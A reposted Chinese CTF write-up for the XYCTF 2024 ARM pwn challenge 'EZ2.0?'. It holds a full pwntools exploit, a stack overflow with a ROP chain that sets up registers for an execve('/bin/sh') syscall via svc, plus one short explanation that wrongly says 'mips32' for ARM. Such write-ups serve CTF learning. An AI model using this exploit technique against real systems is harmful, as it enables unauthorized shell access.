[XYCTF新生赛2024]-PWN:EZ2.0?（arm架构，arm架构下的系统调用）

pingmian/2024/11/15 17:39:05/文章来源:https://blog.csdn.net/2301_79326813/article/details/140063191

查看保护

查看ida

完整exp：

from pwn import*p=process('./arm')
p=remote('gz.imxbt.cn',20082)
svc=0x0001c58c
mov_r2_r4_blx_r3=0x00043224
pop_r7=0x00027d78
pop_r4=0x000104e0
pop_r3=0x00010160
pop_r1=0x0005f824
pop_r0=0x0005f73c
sh=0x0008A090payload=b'a'*0x44
payload+=p32(pop_r0)+p32(sh)
payload+=p32(pop_r1)+p32(0)
payload+=p32(pop_r3)+p32(svc)
payload+=p32(pop_r4)+p32(0)
payload+=p32(pop_r7)+p32(0xB)
payload+=p32(mov_r2_r4_blx_r3)p.send(payload)p.interactive()

因为是arm架构，所以我们要覆盖LR寄存器控制返回地址，对于mips32架构，R0~R3寄存器负责传参，R7寄存器传递系统调用号。这里覆盖R3为SVC是因为后面有跳转R3的指令，覆盖R4是为了后面把R2寄存器覆盖为0。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/37591.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！